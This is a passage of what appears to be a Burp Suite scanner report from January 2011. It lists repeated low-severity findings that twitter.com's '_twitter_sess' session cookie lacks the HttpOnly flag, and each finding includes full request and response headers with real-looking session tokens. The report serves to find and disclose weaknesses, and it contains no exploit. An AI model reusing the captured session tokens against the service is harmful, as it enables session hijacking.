The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Prucenter HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-49777-22631
ETag: "6809b20e173abb1f6aa98709f0f9d6dc"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01106
Content-Type: text/html; charset=utf-8
Content-Length: 52276
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.48. http://twitter.com/PureADK

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /PureADK

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PureADK HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225028-9085-29245
ETag: "6ea59f215eff63985173a556c3c58572"
Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT
X-Runtime: 0.01097
Content-Type: text/html; charset=utf-8
Content-Length: 57696
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.49. http://twitter.com/ROBERTPLANT

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ROBERTPLANT

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ROBERTPLANT HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265969-51236-50087
ETag: "2065838d33813f1ed4f56a5980ac687e"
Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT
X-Runtime: 0.02165
Content-Type: text/html; charset=utf-8
Content-Length: 21714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.50. http://twitter.com/RealLamarOdom

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /RealLamarOdom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealLamarOdom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266006-7436-1947
ETag: "176880d5a04c3fcd8b68fb306d4172bf"
Last-Modified: Sat, 29 Jan 2011 01:53:26 GMT
X-Runtime: 0.01342
Content-Type: text/html; charset=utf-8
Content-Length: 49980
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.51. http://twitter.com/RobertDuffy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /RobertDuffy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RobertDuffy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-67311-52082
ETag: "e57068ea600d03f7a7bf890e4a74a917"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.01335
Content-Type: text/html; charset=utf-8
Content-Length: 50645
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.52. http://twitter.com/ScampoLiberty

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ScampoLiberty

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScampoLiberty HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:49:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265766-16900-43971
ETag: "8619adc934bf80f7ed7769cb2e43b4b1"
Last-Modified: Sat, 29 Jan 2011 01:49:26 GMT
X-Runtime: 0.00936
Content-Type: text/html; charset=utf-8
Content-Length: 50190
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.53. http://twitter.com/Script_Junkie

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Script_Junkie

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Script_Junkie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-37028-38797
ETag: "942c1294489429968d893d85a4217f57"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 47541
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.54. http://twitter.com/Sean_P_Doyle

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Sean_P_Doyle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sean_P_Doyle HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265970-13440-19408
ETag: "cb86339c5381a14bf8b1d3e2b36126a2"
Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT
X-Runtime: 0.01448
Content-Type: text/html; charset=utf-8
Content-Length: 49550
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.55. http://twitter.com/Servigistics

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Servigistics

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Servigistics HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225035-39147-1499
ETag: "7908e6f2089de69430d5a81b1f257ac2"
Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT
X-Runtime: 0.01232
Content-Type: text/html; charset=utf-8
Content-Length: 50563
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.56. http://twitter.com/ShaunieONeal

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ShaunieONeal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ShaunieONeal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-84120-54992
ETag: "f0218d983026f5440ea1c0cdd842e2ee"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01493
Content-Type: text/html; charset=utf-8
Content-Length: 50321
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.57. http://twitter.com/Simply_b06

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Simply_b06

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Simply_b06 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
